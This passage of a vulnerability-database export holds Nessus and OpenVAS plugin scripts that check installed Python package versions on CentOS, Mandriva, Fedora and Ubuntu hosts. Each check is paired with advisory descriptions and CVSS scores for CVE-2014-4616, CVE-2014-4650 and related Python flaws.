cgi-bin directory, or disclose the source code\nof the scripts in the cgi-bin directory. (CVE-2014-4650)\n\nAn integer overflow flaw was found in the way the buffer() function\nhandled its offset and size arguments. An attacker able to control\nthese arguments could use this flaw to disclose portions of the\napplication memory or cause it to crash. (CVE-2014-7185)\n\nA flaw was found in the way the json module handled negative index\narguments passed to certain functions (such as raw_decode()). 
An\nattacker able to control the index value passed to one of the affected\nfunctions could possibly use this flaw to disclose portions of the\napplication memory. (CVE-2014-4616)\n\nThe Python standard library HTTP client modules (such as httplib or\nurllib) did not perform verification of TLS/SSL certificates when\nconnecting to HTTPS servers. A man-in-the-middle attacker could use\nthis flaw to hijack connections and eavesdrop or modify transferred\ndata. (CVE-2014-9365)\n\nNote: The Python standard library was updated to make it possible to\nenable certificate verification by default. However, for backwards\ncompatibility, verification remains disabled by default. Future\nupdates may change this default. Refer to the Knowledgebase article\n2039753 linked to in the References section for further details about\nthis change. (BZ#1219108)\n\nThis update also fixes the following bugs :\n\n* Subprocesses used with the Eventlet library or regular threads\npreviously tried to close epoll file descriptors twice, which led to\nan 'Invalid argument' error. Subprocesses have been fixed to close the\nfile descriptors only once. (BZ#1103452)\n\n* When importing the readline module from a Python script, Python no\nlonger produces erroneous random characters on stdout. (BZ#1189301)\n\n* The cProfile utility has been fixed to print all values that the\n'-s' option supports when this option is used without a correct value.\n(BZ#1237107)\n\n* The load_cert_chain() function now accepts 'None' as a keyfile\nargument. (BZ#1250611)\n\nIn addition, this update adds the following enhancements :\n\n* Security enhancements as described in PEP 466 have been backported\nto the Python standard library, for example, new features of the ssl\nmodule: Server Name Indication (SNI) support, support for new TLSv1.x\nprotocols, new hash algorithms in the hashlib module, and many more.\n(BZ#1111461)\n\n* Support for the ssl.PROTOCOL_TLSv1_2 protocol has been added to the\nssl library. 
(BZ#1192015)\n\n* The ssl.SSLSocket.version() method is now available to access\ninformation about the version of the SSL protocol used in a\nconnection. (BZ#1259421)\n\nAll python users are advised to upgrade to these updated packages,\nwhich contain backported patches to correct these issues and add these\nenhancements.\"\n );\n # https://lists.centos.org/pipermail/centos-cr-announce/2015-November/002560.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?2883d9e8\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected python packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-7185\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:python\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:python-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:python-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:python-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:python-test\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:python-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:tkinter\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/10/08\");\n 
script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/11/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/12/02\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 7.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"python-2.7.5-34.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"python-debug-2.7.5-34.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"python-devel-2.7.5-34.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"python-libs-2.7.5-34.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"python-test-2.7.5-34.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"python-tools-2.7.5-34.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"tkinter-2.7.5-34.el7\")) flag++;\n\n\nif (flag)\n{\n cr_plugin_caveat = '\\n' +\n 'NOTE: The security advisory associated with this vulnerability has a\\n' +\n 'fixed package version that may only be available in the continuous\\n' +\n 'release (CR) repository for CentOS, until it is present in the next\\n' +\n 'point release of CentOS.\\n\\n' +\n\n 'If an equal or higher package level does not exist in the baseline\\n' +\n 'repository for your major version of CentOS, then updates from the CR\\n' +\n 'repository will need to be applied in order to address the\\n' +\n 'vulnerability.\\n';\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + cr_plugin_caveat\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"python / python-debug / python-devel / python-libs / python-test / 
etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-07T11:54:39", "description": "Updated python and python-simplejson packages fix security\nvulnerability\n\nPython is susceptible to arbitrary process memory reading by a user\nor adversary due to a bug in the _json module caused by insufficient\nbounds checking. The bug is caused by allowing the user to supply a\nnegative value that is used as an array index, causing the scanstring\nfunction to access process memory outside of the string it is intended\nto access (CVE-2014-4616).\n\nThis issue also affected the python-simplejson package, which has been\npatched to fix the bug.", "edition": 25, "published": "2014-07-11T00:00:00", "title": "Mandriva Linux Security Advisory : python (MDVSA-2014:135)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-4616"], "modified": "2014-07-11T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:tkinter", "p-cpe:/a:mandriva:linux:lib64python2.7", "cpe:/o:mandriva:business_server:1", "p-cpe:/a:mandriva:linux:tkinter-apps", "p-cpe:/a:mandriva:linux:python-docs", "p-cpe:/a:mandriva:linux:python", "p-cpe:/a:mandriva:linux:python-simplejson", "p-cpe:/a:mandriva:linux:lib64python-devel"], "id": "MANDRIVA_MDVSA-2014-135.NASL", "href": "https://www.tenable.com/plugins/nessus/76471", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2014:135. 
\n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(76471);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2014-4616\");\n script_bugtraq_id(68119);\n script_xref(name:\"MDVSA\", value:\"2014:135\");\n\n script_name(english:\"Mandriva Linux Security Advisory : python (MDVSA-2014:135)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated python and python-simplejson package fixes security\nvulnerability\n\nPython are susceptible to arbitrary process memory reading by a user\nor adversary due to a bug in the _json module caused by insufficient\nbounds checking. The bug is caused by allowing the user to supply a\nnegative value that is used an an array index, causing the scanstring\nfunction to access process memory outside of the string it is intended\nto access (CVE-2014-4616).\n\nThis issue also affected the python-simplejson package, which has been\npatched to fix the bug.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://advisories.mageia.org/MGASA-2014-0285.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://advisories.mageia.org/MGASA-2014-0286.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n 
script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64python-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64python2.7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:python\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:python-docs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:python-simplejson\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:tkinter\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:tkinter-apps\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:business_server:1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/07/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/07/11\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK-MBS1\", 
cpu:\"x86_64\", reference:\"lib64python-devel-2.7.3-4.7.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"lib64python2.7-2.7.3-4.7.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"python-2.7.3-4.7.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"python-docs-2.7.3-4.7.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"python-simplejson-2.3.3-2.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"tkinter-2.7.3-4.7.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"tkinter-apps-2.7.3-4.7.mbs1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_note(port:0, extra:rpm_report_get());\n else security_note(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}], "openvas": [{"lastseen": "2020-03-03T20:57:20", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-4616", "CVE-2014-4650"], "description": "Check the version of python3", "modified": "2020-03-02T00:00:00", "published": "2014-11-10T00:00:00", "id": "OPENVAS:1361412562310868464", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310868464", "type": "openvas", "title": "Fedora Update for python3 FEDORA-2014-14245", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for python3 FEDORA-2014-14245\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied 
warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.868464\");\n script_version(\"2020-03-02T07:51:06+0000\");\n script_tag(name:\"last_modification\", value:\"2020-03-02 07:51:06 +0000 (Mon, 02 Mar 2020)\");\n script_tag(name:\"creation_date\", value:\"2014-11-10 05:10:57 +0100 (Mon, 10 Nov 2014)\");\n script_cve_id(\"CVE-2014-4650\", \"CVE-2014-4616\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for python3 FEDORA-2014-14245\");\n script_tag(name:\"summary\", value:\"Check the version of python3\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"python3 on Fedora 20\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2014-14245\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-November/142831.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC20\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = 
rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC20\")\n{\n\n if ((res = isrpmvuln(pkg:\"python3\", rpm:\"python3~3.3.2~18.fc20\", rls:\"FC20\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:37:37", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-4238", "CVE-2014-4616"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2014-07-21T00:00:00", "id": "OPENVAS:1361412562310867978", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310867978", "type": "openvas", "title": "Fedora Update for python3 FEDORA-2014-8035", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for python3 FEDORA-2014-8035\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.867978\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-07-21 12:28:02 +0530 (Mon, 21 Jul 2014)\");\n script_cve_id(\"CVE-2014-4616\", \"CVE-2013-4238\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_name(\"Fedora Update for python3 FEDORA-2014-8035\");\n script_tag(name:\"affected\", value:\"python3 on Fedora 19\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2014-8035\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-July/135423.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'python3'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC19\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC19\")\n{\n\n if ((res = 
isrpmvuln(pkg:\"python3\", rpm:\"python3~3.3.2~9.fc19\", rls:\"FC19\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-05-29T18:37:15", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-4238", "CVE-2014-4616"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2014-07-21T00:00:00", "id": "OPENVAS:1361412562310867987", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310867987", "type": "openvas", "title": "Fedora Update for python FEDORA-2014-7772", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for python FEDORA-2014-7772\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.867987\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-07-21 14:23:39 +0530 (Mon, 21 Jul 2014)\");\n script_cve_id(\"CVE-2014-4616\", \"CVE-2013-4238\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_name(\"Fedora Update for python FEDORA-2014-7772\");\n script_tag(name:\"affected\", value:\"python on Fedora 19\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2014-7772\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-July/135433.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'python'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC19\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC19\")\n{\n\n if ((res = 
isrpmvuln(pkg:\"python\", rpm:\"python~2.7.5~13.fc19\", rls:\"FC19\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-03-03T20:56:59", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-4238", "CVE-2014-4650"], "description": "Check the version of python", "modified": "2020-03-02T00:00:00", "published": "2014-11-23T00:00:00", "id": "OPENVAS:1361412562310868512", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310868512", "type": "openvas", "title": "Fedora Update for python FEDORA-2014-14266", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for python FEDORA-2014-14266\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.868512\");\n script_version(\"2020-03-02T07:51:06+0000\");\n script_tag(name:\"last_modification\", value:\"2020-03-02 07:51:06 +0000 (Mon, 02 Mar 2020)\");\n script_tag(name:\"creation_date\", value:\"2014-11-23 06:45:08 +0100 (Sun, 23 Nov 2014)\");\n script_cve_id(\"CVE-2014-4650\", \"CVE-2013-4238\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for python FEDORA-2014-14266\");\n script_tag(name:\"summary\", value:\"Check the version of python\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"python on Fedora 19\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2014-14266\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-November/144826.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC19\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release 
== \"FC19\")\n{\n\n if ((res = isrpmvuln(pkg:\"python\", rpm:\"python~2.7.5~15.fc19\", rls:\"FC19\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-02-27T14:56:10", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1753", "CVE-2014-7185", "CVE-2014-4616", "CVE-2013-1752", "CVE-2014-4650"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2015-06-26T00:00:00", "id": "OPENVAS:1361412562310842261", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842261", "type": "openvas", "title": "Ubuntu Update for python2.7 USN-2653-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for python2.7 USN-2653-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842261\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-06-26 06:25:01 +0200 (Fri, 26 Jun 2015)\");\n script_cve_id(\"CVE-2013-1752\", \"CVE-2013-1753\", \"CVE-2014-4616\", \"CVE-2014-4650\",\n \"CVE-2014-7185\");\n script_tag(name:\"cvss_base\", value:\"6.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for python2.7 USN-2653-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'python2.7'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"It was discovered that multiple Python\nprotocol libraries incorrectly limited certain data when connecting to servers.\nA malicious ftp, http, imap, nntp, pop or smtp server could use this issue to\ncause a denial of service. (CVE-2013-1752)\n\nIt was discovered that the Python xmlrpc library did not limit unpacking\ngzip-compressed HTTP bodies. A malicious server could use this issue to\ncause a denial of service. (CVE-2013-1753)\n\nIt was discovered that the Python json module incorrectly handled a certain\nargument. An attacker could possibly use this issue to read arbitrary\nmemory and expose sensitive information. 
